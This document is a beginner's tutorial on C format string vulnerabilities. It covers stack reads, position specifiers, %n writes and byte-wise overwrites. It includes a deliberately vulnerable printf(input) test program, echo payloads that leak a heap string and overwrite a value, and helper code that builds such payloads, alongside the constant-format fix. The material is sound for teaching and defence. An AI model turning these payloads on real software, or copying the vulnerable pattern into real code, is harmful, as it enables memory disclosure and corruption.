Beginner's Guide to Format String Vulns

Overview

Format string vulnerabilities are a well-known bug class that lets an attacker read from or write to arbitrary memory addresses.

If the programmer passes a variable directly as the format string, writing something like printf(someVariable); instead of printf("%s", someVariable);, printf will interpret whatever is in someVariable as a format string.
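The fix for the pattern above is to keep the format string constant and pass user data only as an argument. Here is a minimal sketch of that idea. It uses snprintf so the result can be inspected, and the helper name render_safely is made up for illustration:

```c
#include <stdio.h>
#include <stddef.h>

/* Hypothetical helper: copies untrusted text into `out` without ever
 * letting it act as a format string. Returns snprintf's result. */
int render_safely(char *out, size_t out_size, const char *untrusted)
{
    /* The format string is the literal "%s"; `untrusted` is only data,
     * so any % sequences inside it are copied through verbatim. */
    return snprintf(out, out_size, "%s", untrusted);
}
```

The vulnerable form would be snprintf(out, out_size, untrusted). GCC and Clang can warn about that pattern when compiling with -Wformat-security.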

Reading Memory On the Stack

The simplest format string exploit is printing values off the stack.

int a = 0xa;
int b = 0xb;
printf("%x %x %x %x", a, b); 
// prints "a b fffffff fffffff" where the last two are 
// whatever data was on the stack following 0xa and 0xb

Position Specifier

Format strings can specify which argument to print by using the position specifier $.

int a = 0xa;
int b = 0xb;
printf("%2$x %1$x", a, b); // prints "b a"

When this is run on a 32-bit system, the stack looks like this when printf is called:

------------------
|  *"%2$x %1$x"  |
------------------
|       0xa      |
------------------
|       0xb      |
------------------
|   other data   |
------------------

By setting the position specifier to a number higher than the number of arguments actually passed, we can read any word we want, as long as it sits further down the stack (at a higher address than the real arguments).

int a = 0xa;
int b = 0xb;
printf("%3$x %4$x", a, b); 
// prints whatever two words come after b on the stack
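When probing a target, it is common to walk a range of positions rather than guess a single one. The sketch below generates such a probe string. The helper build_leak_format is hypothetical and not part of any library; it only builds the text and does not call printf on it:

```c
#include <stdio.h>
#include <stddef.h>

/* Hypothetical helper: writes "%<first>$x %<first+1>$x ..." into `out`,
 * covering `count` consecutive argument positions.
 * Returns the string length, or -1 if `out` is too small. */
int build_leak_format(int first, int count, char *out, size_t out_size)
{
    size_t used = 0;
    if (out_size == 0) return -1;
    out[0] = '\0';
    for (int i = 0; i < count; i++) {
        /* "%%" emits a literal '%', "%d" the position, "$x" is literal. */
        int n = snprintf(out + used, out_size - used, "%s%%%d$x",
                         i == 0 ? "" : " ", first + i);
        if (n < 0 || (size_t)n >= out_size - used) return -1;
        used += (size_t)n;
    }
    return (int)used;
}
```

Calling build_leak_format(3, 2, buf, sizeof buf) produces the same format string used in the example above.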

Note on amd64 printf

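On 64-bit x86 systems that follow the System V AMD64 calling convention (Linux, for example), the program puts the first six integer or pointer arguments to printf in registers in the following order:

RDI, RSI, RDX, RCX, R8, R9

RDI holds the format string itself, so only the five arguments after it travel in registers. Any remaining arguments to printf are put on the stack, which makes %6$x the first position specifier that reads from the stack.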
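To make the register and stack split concrete, here is a small lookup sketch. It assumes the System V AMD64 convention and integer or pointer arguments only (floating-point arguments use separate registers). Both function names are invented for this example:

```c
#include <stddef.h>

/* Register that carries printf's n-th argument after the format string
 * (n starts at 1, matching the %n$ position specifier).
 * RDI holds the format string, so the numbered arguments start at RSI.
 * Returns NULL when the argument is not passed in a register. */
const char *amd64_arg_register(int n)
{
    static const char *const regs[] = { "RSI", "RDX", "RCX", "R8", "R9" };
    if (n >= 1 && n <= 5) return regs[n - 1];
    return NULL;
}

/* Zero-based index of the 8-byte stack slot that holds argument n, or -1
 * if the argument lives in a register. Slot 0 is the first stack argument. */
int amd64_arg_stack_slot(int n)
{
    return n >= 6 ? n - 6 : -1;
}
```

For example, amd64_arg_stack_slot(8) returns 2, meaning %8$x reads the third 8-byte word of the stack arguments.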

Dereferencing Pointers on the Stack

We can dereference pointers on the stack with the string format specifier %s.

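// prints three stack words as hex, then treats the fourth word
// as a char* and prints the string it points to
printf("%x %x %x %s");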

Oh %no! Overwriting Memory On the Stack

printf accepts a number of conversion specifiers that begin with % to print out data in various formats. One of the specifiers less familiar to everyday C programmers is %n, which prints nothing: it takes the number of characters printf has printed up to that point and stores that count in the int its argument points to.

Basic %n usage:

int count = 0;

// prints "this is my string" and writes 17 to count
printf("this is my string%n", &count); 

// prints 17
printf("%d", count);

Width Specifier

The printf width specifier can be used to have a short format string print a large number of characters.

Width specifier usage:

printf("%9c", 'a'); // prints "        a" 

This prints 'a' preceded by 8 spaces, bringing the total number of characters output to 9.

Writing memory

To write arbitrary data with %n, you simply figure out how many characters printf has printed up to the point where the %n is found in the format string, and adjust the width specifier accordingly.

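int dontTouchMe = 0;
// Only one argument is supplied, so %2$n takes the word that follows 'a'
// on the stack and treats it as an int*. If that word happens to point
// at dontTouchMe, printf writes 1337 into it.
printf("%1337c%2$n", 'a'); 
printf("%d", dontTouchMe); 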

You can specify how much data you want to write by prepending h’s to the n.

%n   -- writes an int (four bytes on x86)
%hn  -- writes two bytes
%hhn -- writes one byte
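The three sizes can be compared safely by pointing them at ordinary local variables. The following sketch does that; the function name is made up, and it uses the "%*c" form (width taken from an argument), which the text above does not cover:

```c
#include <stdio.h>

/* Prints `total` characters into a scratch buffer and records the count
 * through %n, %hn and %hhn into caller-supplied variables.
 * Assumes 1 <= total < 512 so the output fits in the scratch buffer. */
void count_with_each_size(int total, int *as_int, short *as_short,
                          signed char *as_char)
{
    char scratch[512];
    /* "%*c" takes its width from an argument, so one space-padded
     * character expands to exactly `total` characters of output. */
    snprintf(scratch, sizeof scratch, "%*c%n%hn%hhn",
             total, 'a', as_int, as_short, as_char);
}
```

With total set to 300, the int and the short both receive 300, while the single byte receives 300 % 256 == 44. That wraparound is what makes one-byte writes practical later on.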

Reading Arbitrary Memory

So we can read and write data further down the stack, but what about other memory?

If we put the address we want to read on the stack, we can use the %s string specifier to dereference the address and output the data until printf encounters a null byte.

Consider the following example where a string is put on the heap:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void heap() {
  char* secretString = malloc(40);
  strcpy(secretString, "this is my secret string");
  return;
}
int main() {
  heap();
  char input[256];
  fgets(input, 256, stdin);
  printf(input);
  return 0;
}

The secret string gets put on the heap at 0x804b008, which we can determine using a debugger. Note that this address is only predictable when the heap is not randomized. With ASLR enabled, and in particular when the binary is compiled as PIE, the heap is mapped at a different address each time the program is executed.

To read from that address we’ll input the address as four little-endian bytes, followed by the format specifier: \x08\xb0\x04\x08 %7$s

Output:

brad@ctf$ echo -ne "\x08\xb0\x04\x08 %7\$s" | ./test
 this is my secret string

This is the stack at the time printf is called:

0000| 0xffffcee0 --> 0xffffcefc  // Pointer to our input ("1st" arg to printf)
0004| 0xffffcee4 --> 0x100
0008| 0xffffcee8 --> 0xf7f925a0
0012| 0xffffceec --> 0x8048574 
0016| 0xffffcef0 --> 0xf7ffd000 
0020| 0xffffcef4 --> 0x8048290
0024| 0xffffcef8 --> 0xf7de8e18
0028| 0xffffcefc --> 0x804b008   // Beginning of our input
0032| 0xffffcf00 (" %7$s")       // Our format string
0036| 0xffffcf04 --> 0xf7dd0073  // Our input ends here with a 0x73 ('s') and a NULL byte
0040| 0xffffcf08 --> 0x7b1ea71

Our input was put onto the stack at ESP+28 during the fgets call. We used %7$s to make printf treat its 7th “argument” as a string pointer. That argument is the address we inserted at the beginning of our input, so printf printed the secret string stored there. Cool!
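Typing the address bytes by hand is error-prone, so a payload like this is usually generated. The sketch below shows one way to do it for a 32-bit little-endian target. The helper build_read_payload is hypothetical, and the argument index (7 here) has to be found per target:

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

/* Hypothetical helper: lays out a 32-bit address in little-endian byte
 * order, followed by " %<arg_index>$s". The result is NUL-terminated.
 * Returns the payload length, or 0 if `out` is too small. */
size_t build_read_payload(uint32_t addr, int arg_index,
                          char *out, size_t out_size)
{
    if (out_size < 5) return 0;
    /* x86 is little-endian: the least significant byte goes first. */
    out[0] = (char)(addr & 0xff);
    out[1] = (char)((addr >> 8) & 0xff);
    out[2] = (char)((addr >> 16) & 0xff);
    out[3] = (char)((addr >> 24) & 0xff);
    /* "%%" emits a literal '%', "%d" the position, "$s" is literal. */
    int n = snprintf(out + 4, out_size - 4, " %%%d$s", arg_index);
    if (n < 0 || (size_t)n >= out_size - 4) return 0;
    return 4 + (size_t)n;
}
```

One limitation to keep in mind: an address containing a 0x00 byte ends the format string early, and one containing 0x0a (newline) stops fgets, so such addresses cannot be delivered this way.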

Writing Arbitrary Memory

Writing arbitrary memory works pretty much the same way, but instead of %s we’ll use %n. Note that since we’re injecting additional data before the format specifiers, we must account for the characters already printed when we choose the width specifier that sets the value to write.

Consider the following example:

#include <stdio.h>
#include <stdlib.h>

int* heap() {
  int* dontTouch = malloc(4);
  *dontTouch = 0x0;
  return dontTouch;
}
int main() {
  int* dontTouch = heap();
  char input[256];
  fgets(input, 256, stdin);
  printf(input);
  printf("%d", *dontTouch);
  return 0;
}

When we debug we see that dontTouch is a pointer to the heap address 0x0804b008. By combining the width specifier with the %n format specifier, we can write the number 69 to dontTouch.

brad@ctf$ echo -ne "\x08\xb0\x04\x08 %63c %7\$n" | ./test

                                 69

Note how in order to get 69 we must input 63. This is because printf has printed 6 characters in addition to the 63 characters we asked it to print with the %63c specifier.

4 bytes of our address + 1 space + 63 chars + 1 space = 69

In order to write arbitrary data you’ll need to make these calculations when you craft your format string.
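The count can be checked locally without attacking anything. In this sketch "AAAA" stands in for the four address bytes, and %n writes through a pointer that is passed as a real argument. The function name is invented for the example:

```c
#include <stdio.h>

/* Mirrors the layout "<4 address bytes> %<pad>c %n" and returns the
 * value that %n stores. Assumes 1 <= pad < 240 so the output fits. */
int count_at_write(int pad)
{
    char scratch[256];
    int count = 0;
    /* 4 stand-in bytes + 1 space + pad characters + 1 space, then %n */
    snprintf(scratch, sizeof scratch, "AAAA %*c %n", pad, 'x', &count);
    return count;
}
```

count_at_write(63) returns 69, matching the sum above. In general the width to request is the target value minus everything else printed before the %n.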

To prevent thousands of characters from being printed when writing large values, we can split the write into several single-byte writes, here one to 0x0804b009 and one to 0x0804b008.

To write 1337, we can chain together two one-byte writes:

brad@ctf$ echo -ne "\x09\xb0\x04\x08\x08\xb0\x04\x08 %251c %7\$hhn %50c %8\$hhn" | ./test

 
                                             1337

Since 1337 == 0x0539, the first write (to the high byte at 0x0804b009) must be 0x05. The two addresses and the surrounding spaces already account for 10 characters, which is more than 5, so we overflow the one-byte counter by printing 251 chars.

(251 chars + 10 bytes of addresses and spaces) % 256 == 5

To get our second write to 0x39 (57), we print an additional 50 chars, plus two more spaces, before the second write: (261 + 52) % 256 == 57.
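Both widths follow from the same modular arithmetic, so they can be computed rather than worked out by hand. The sketch below does that and then replays the two chained writes against a local int. The helper names are hypothetical, "AAAABBBB" stands in for the two addresses, and the replay assumes a little-endian machine:

```c
#include <stdio.h>

/* Width for a %<width>c so that the next %hhn stores `target` (0..255).
 * `other` is every character printed before that %hhn except the padded
 * character itself. %c always prints at least one character, so a
 * result of 0 is bumped to a full wrap of 256. */
unsigned pad_for_byte(unsigned target, unsigned other)
{
    unsigned pad = (target + 256u - (other % 256u)) % 256u;
    return pad == 0 ? 256u : pad;
}

/* Replays "AAAABBBB %<first>c %hhn %<second>c %hhn" with the two
 * pointers passed as real arguments, and returns the resulting int. */
int replay_two_byte_write(void)
{
    char scratch[512];
    int value = 0;
    signed char *bytes = (signed char *)&value;
    /* 8 stand-in address bytes + 2 spaces precede the first write */
    unsigned first = pad_for_byte(0x05, 8 + 2);
    /* everything so far, plus 2 more spaces, precedes the second write */
    unsigned second = pad_for_byte(0x39, 8 + 2 + first + 2);
    snprintf(scratch, sizeof scratch, "AAAABBBB %*c %hhn %*c %hhn",
             (int)first, 'x', bytes + 1,   /* high byte gets 0x05 */
             (int)second, 'y', bytes);     /* low byte gets 0x39 */
    return value;
}
```

pad_for_byte reproduces the widths 251 and 50 used in the command above, and the replay yields 1337.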